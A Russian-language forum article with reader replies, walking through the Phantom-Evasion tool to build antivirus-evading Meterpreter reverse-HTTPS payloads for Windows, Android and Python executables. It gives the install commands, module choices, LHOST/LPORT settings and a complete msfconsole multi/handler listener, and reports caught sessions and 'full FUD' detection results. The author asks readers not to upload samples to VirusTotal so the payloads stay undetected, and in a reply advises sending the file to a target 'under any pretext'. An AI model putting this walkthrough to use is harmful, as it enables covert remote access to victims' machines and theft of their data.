Статья Phantom-evasion FUD payloads

И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ?
Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше.

(Для генерации pyinstaller требуется python 2.7). Основной задачей данного инструмента является генерирование полезной нагрузки с обходом почти АВ почти 100% FUD на сегодняшний день.
Форматы выпуска payloads: exe/elf/apk/dmg
Платформы:
Windows,Linux,Android,Osx,Universal (Platform-Target)
Виды payloads:
  • windows/meterpreter/reverse_tcp for exe
  • linux/x86/meterpreter/reverse_tcp for elf
  • android/meterpreter/reverse_tcp for apk
  • osx/x64/meterpreter/reverse_tcp for dmg
  • python/meterpreter/reverse_tcp in Universal modules
Формат модулей рассмотрим далее. Перейдем к установке. Я буду использовать Kali Linux 2017.3 в виде атакующей машины, Windows Server 2012 R3 и Windows 10 (Build 16299) в виде атакуемой машины.

Вся информация предоставляется в ознакомительных целях. Данная статья описывает последовательность действий и инструменты, с помощью которых злоумышленник может проникнуть в Вашу систему и похитить ваши данные.

Установка :
Код:
git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod +x phantom-evasion.py


Запуск:
Код:
./phantom-evasion.py

Проверка зависимостей
upload_2017-11-26_20-26-44.png


Если все окей, то видим следующую картину:

upload_2017-11-26_20-27-36.png


Посмотреть список всех модулей:

Код:
1 enter

upload_2017-11-26_20-29-27.png


Сегодня я продемонстрирую генерацию полезной нагрузки для Windows, Android. Вернемся в главное меню (0). Выберем список модулей Windows (2)

upload_2017-11-26_20-30-44.png


Пробуем вариант под номер 1

upload_2017-11-26_20-31-40.png


Выберем способ генерации шелкода. Я выбираю с помощью всеми известного msfvenom.

Код:
1 enter
Далее нас просят выбрать тип payload. Я выберу следующий:
Код:
windows/meterpreter/reverse_https
Далее нужно прописать LHOST ( на какой айпишник стучаться)
Код:
ip
Далее нужно прописать LPORT(на какой порт стучаться)
Код:
2222
После выбрать имя файла
ForCodeby
После чего пойдет генерации и компиляция нашего payload. Если все успешно, то в нашей папке будет хранится файл ForCodeby.exe


upload_2017-11-26_20-38-3.png


Проверим работоспособность нашего payload, так же посмотрим результаты на nodistribute.com
Запустим хандлер и будет слушать Ip и порт, который мы указали при генерации payload:

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.102
set LPORT 2222
exploit -j

После запуска на целевом компьютере в процессах появится процесс : ForCodeby.exe

upload_2017-11-26_20-45-37.png


Проверим файл на nodistribute.com



И видим полный FUD!!

upload_2017-11-26_20-49-22.png


Уважительная просьба не лить на VIRUS TOTAL. Дайте полезной нагрузке подышать свежим воздухом< ВЗДОХНУТЬ ГЛОТОК СВОБОДЫ!) Проверяйте хотя бы на сайте, на котором проверил я. От этого будет лучше всем, кроме АВ компаний. Спасибо!

Что ж, хороший старт, давайте создадим еще один с помощью другого способа, тоже для Windows. С использованием абсолютно тех же параметров, которые я указал выше. Я не буду скринить процесс, он ничем не будет отличаться от выше стоящего, за исключением выбора модуля.

Я выбираю:

Код:
[2] Windows MultipathHeapAlloc  (C)

upload_2017-11-26_20-55-3.png


Все, файл создан. Проверим работоспособность. Отправим на атакуемую машину и запустим.

upload_2017-11-26_20-58-22.png



Как видим снова Prof1t! ^_^
Процесс запущен, сессия прилетела. Доступ к командной строке получен =)


Результаты обнаружения тоже радуют глаз.

upload_2017-11-26_21-2-9.png


Что ж, я думаю с виндовс достаточно двух примеров. Сразу хочу сказать что 3-й способ я тоже пробовал
Какой - то Богом забытый что-то нашел, но это не страшно)

Результат :

Также, по просьбе ghostphisher в теме https://codeby.net/threads/uvazhaemye-avtory-tem.61280/ я проверю работоспособность PAYLOAD на Windows 10

ggbMEs7dOyg.jpg


Как видим, профит!

Теперь попробуй сгенерить файлик для анроид. Самому интересно че и как будет :)

В главном меню выберем:
Код:
[5]  List Android modules
Далее выбор не большой)
Код:
[1] Android Droidmare msfvenom-rebuilder (Smali)[/B][/B][/B][/B][/B]
[B][B][B][B][B][1] Obfuscate msf payload

После чего формальности заполнения LHOST and LPORT и выбор payload
Код:
android/meterpreter/reverse_https

PVIon_Ca_bQ.jpg


Собственно видим успешную генерацию PAYLOAD!) Но рано радоваться, надо проверить его работу и обнаружение! Убедительная просьба для тех, у кого есть анроид, проверить АВАСПОМ и dr Web. Почему сам не могу? У меня кирпич под названием "недостаточно памяти" galaxy ace S5830 который вздрагивает каждый раз, когда я беру его в руки. Поэтому я покажу результат обнаружения на нодистр, а внутренним антивирусом телефона не буду прогонять. Так же сейчас нахожусь не дома, поэтому нет виртуального ведроида) Просто запущу пайлоад, чтобы проверить его работу!

Сессия у меня не прилетает, не знаю с чем это связано. Может ведроид мой совсем плох, с помощью Evil-Droid сгенерированный файл отлично отрабатывает. Здесь процесс появился, но никто на порт не стучится. Если кто будет пробовать, отпишитесь о результатах у себя.


Обнаружение:

upload_2017-11-26_21-38-10.png



Теперь попробуем сгенерировать питоновский файл to exe)
Для этого в главном меню выберем 6


upload_2017-11-26_22-4-17.png




upload_2017-11-26_22-7-11.png


Код:
[2] Universal Polymorphic Pyhterpreter (Python)[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR][/B]
[B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000]python/meterpreter/reverse_https

Далее LHOST and LPORT и после предложить сгенерить .ехе, жмем y. Все на выходе появился наш файл.


Проверим его работу на вин 10 с питоном 2.7

upload_2017-11-26_22-11-5.png


После запуска на стороне вин 10 пришла сессия.
Результат скана :

upload_2017-11-26_22-12-46.png



Если подвести итоги, то в целом я получил хорошие впечатления) Вышел он недавно, надеюсь поживет еще. Хотя в версии 0.2 они обещали все обновить еще раз! Надеюсь статья получилось годной, спасибо за внимание, всем Prof1t! =)
 

Вложения

  • upload_2017-11-26_20-36-9.png
    upload_2017-11-26_20-36-9.png
    10,6 КБ · Просмотры: 278
  • upload_2017-11-26_20-58-4.png
    upload_2017-11-26_20-58-4.png
    128,1 КБ · Просмотры: 292
  • upload_2017-11-26_21-30-17.png
    upload_2017-11-26_21-30-17.png
    24,4 КБ · Просмотры: 339
  • upload_2017-11-26_21-30-42.png
    upload_2017-11-26_21-30-42.png
    25,3 КБ · Просмотры: 285
  • upload_2017-11-26_22-10-9.png
    upload_2017-11-26_22-10-9.png
    4,6 КБ · Просмотры: 314
Последнее редактирование модератором:
R

remez

Отличная статья все прекрасно изложено и со скринами. И самое главное Veil свежий, свежее не куда. 11 дней выпуска.
Автору уважение и респект.
 

Remir

Grey Team
05.11.2017
283
355
BIT
378
уважение и респект.
Извиняюсь - не утерпел...
Самому не противно? Вместо показушной осведомленности показывается как раз обратная сторона.
Respect ([ri'spekt]) - англ: уважение
А теперь прочти свое "масло масляное".
 
  • Нравится
Реакции: remez
R

remez

А теперь прочти свое "масло масляное".
Автору уважение и почтение ( respect).
Так лучше переводится?
Автору уважение и respect (почтение) :)
Самому не противно? Вместо показушной осведомленности показывается как раз обратная сторона.
 

e.exploit

Green Team
11.09.2016
21
9
BIT
24
Понравилось, что материал разжеван подробней(как в рекламе "в три раза меньше пятен"). Для новичков да и просто экономии времени само то.
 
R

remez

Это СИНОНИМЫ (пояснять, надеюсь, не нужно?)
Как говорят в Одессе, это есть две большие разницы костолом и костоправ.
Для "лингвиста", которому оказывается надо пояснить.Поясняю:

Уважение - к равным по возможностям.

Почтение к тем, чьи возможности для тебя не достижимы
и вообще представляются, чем то труднообъяснимым и загадочным.

Вместо показушной осведомленности показывается как раз обратная сторона.
Прежде чем кого-то исправлять, загляни в толковый словарь "Великого и могучего..."
 
Последнее редактирование модератором:
  • Нравится
Реакции: Tihon49

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Зачем? Нет, просто создай к примеру бат. Потом переведи в ЕХЕ

Я немножко в танке....

1. Создаешь листенер в Empire.
2. Генеришь под него windows/launcher_bat.
3. Дальше bat конвертируешь в exe.
4. Затем загоняешь получившийся exe в phantom?

Если все так, то в каком разделе phantom-evasion и как указывать путь до подготовленного exe?
 
O

OneDollar

Я немножко в танке....

1. Создаешь листенер в Empire.
2. Генеришь под него windows/launcher_bat.
3. Дальше bat конвертируешь в exe.
4. Затем загоняешь получившийся exe в phantom?

Если все так, то в каком разделе phantom-evasion и как указывать путь до подготовленного exe?
Я не загоняю ничего в PHANTOM. Просмотри еще раз статью и создание файла.
 
T

TST

всех приветствую. У кого встречалась проблема при генерации шеллкода?
Screenshot from 2017-11-28 15-56-06.png
 

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Просмотри еще раз статью и создание файла.

Посмотрел и запутался еще больше.

В статье Вы создаете в phantom нагрузку meterpreter и получаете сессию на handler в msf.
Потом пишите, что сессию получаете в Empire.
Но для того, чтобы получить сессию в Empire, надо и нагрузку создать в том же Empire.
А потом эту нагрузку с помощью phantom сделать "невидимой" для АВ...

Что я упускаю?
 
O

OneDollar

Посмотрел и запутался еще больше.

В статье Вы создаете в phantom нагрузку meterpreter и получаете сессию на handler в msf.
Потом пишите, что сессию получаете в Empire.
Но для того, чтобы получить сессию в Empire, надо и нагрузку создать в том же Empire.
А потом эту нагрузку с помощью phantom сделать "невидимой" для АВ...

Что я упускаю?
Выкиньте из головы Empire) Он к этой статье вообще не относится ) Я описал как я работаю, не запутывайтесь. Вы создаете файл через фантом и отправляете под любым предлогом потенциальному "клиенту", он запускает и вуаля, хэндлер Ваш ловит сессию. Гениальное - просто)
 

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Выкиньте из головы Empire) Он к этой статье вообще не относится ) Я описал как я работаю, не запутывайтесь. Вы создаете файл через фантом и отправляете под любым предлогом потенциальному "клиенту", он запускает и вуаля, хэндлер Ваш ловит сессию. Гениальное - просто)

Да, это Вы предельно ясно изложили в статье. Такой способ работает отлично.

Просто мне самому Empire в качестве модуля постэксплуатации понравился больше. Вот и подумал, что было бы неплохо совместить лисенер Empire и невидимую нагрузку из phantom... Чтобы и запускалось без палева и работать с пост было удобно, а не выбирать одно из двух.
Может когда-нибудь кто-нибудь и напишет...
 
O

OneDollar

Да, это Вы предельно ясно изложили в статье. Такой способ работает отлично.

Просто мне самому Empire в качестве модуля постэксплуатации понравился больше. Вот и подумал, что было бы неплохо совместить лисенер Empire и невидимую нагрузку из phantom... Чтобы и запускалось без палева и работать с пост было удобно, а не выбирать одно из двух.
Может когда-нибудь кто-нибудь и напишет...
Работайте с двумя фрамеворками сразу :) Оч удобно. В одном затупило, в другом сделал
 
  • Нравится
Реакции: remez

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Работайте с двумя фрамеворками сразу :) Оч удобно. В одном затупило, в другом сделал

Так в том то и дело... Я почему все про этот Empire спрашиваю...

Когда получаю сессию meterpreter-a(АВ цели его не палит), я пытаюсь как-нибудь залить stager от Empire, вот тут то АВ и просыпается. И батники пробовал и просто строку(multi/launcher) в CMD(там какая-то ошибка памяти, сейчас не воспроизведу)
А так, разумеется, две сессии для разных фреймворков лучше одной.
 
O

OneDollar

Так в том то и дело... Я почему все про этот Empire спрашиваю...

Когда получаю сессию meterpreter-a(АВ цели его не палит), я пытаюсь как-нибудь залить stager от Empire, вот тут то АВ и просыпается. И батники пробовал и просто строку(multi/launcher) в CMD(там какая-то ошибка памяти, сейчас не воспроизведу)
А так, разумеется, две сессии для разных фреймворков лучше одной.
Прочитай на форуме про empire, хорошая статья от даркнода есть.
 
O

Oddcod3

Hi everybody i'm oddcod3, the author of Phantom Evasion, i'm really glad to see you've apprecieted the tool!!
Feel free to send me email regarding problems or information of the tool!
It's born only few weeks ago and i will keep updating and upgrading it untill my brain find ways to fool antiviruses!
Actually all the modules uses resource consumption technique to fool all the best dynamic analysis engine of antiviruses (AVG,AVAST,AVIRA) but use simple shikata_ga_nai encoding to evade static analysis.
The versione 0.2 is coming with much more polymorphism and with a custom Multibyte key XOR algorithm with c decryption stub making static analysis evasion a lot stronger!

Kind regards

Diego Cornacchini (oddcod3)

Italy
 
Последнее редактирование модератором:
O

OneDollar

Hi everybody i'm oddcod3, the author of Phantom Evasion, i'm really glad to see you've apprecieted the tool!!
Feel free to send me email regarding problems or information of the tool!
It's born only few weeks ago and i will keep updating and upgrading it untill my brain find ways to fool antiviruses!
Actually all the modules uses resource consumption technique to fool all the best dynamic analysis engine of antiviruses (AVG,AVAST,AVIRA) but use simple shikata_ga_nai encoding to evade static analysis.
The versione 0.2 is coming with much more polymorphism and with a custom Multibyte key XOR algorithm with c decryption stub making static analysis evasion a lot stronger!

Kind regards

Diego Cornacchini (oddcod3)

Italy
Nice! Thank you :) on versione 0.2 we can generate payload with powershell?
 
  • Нравится
Реакции: Vertigo и ghost
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!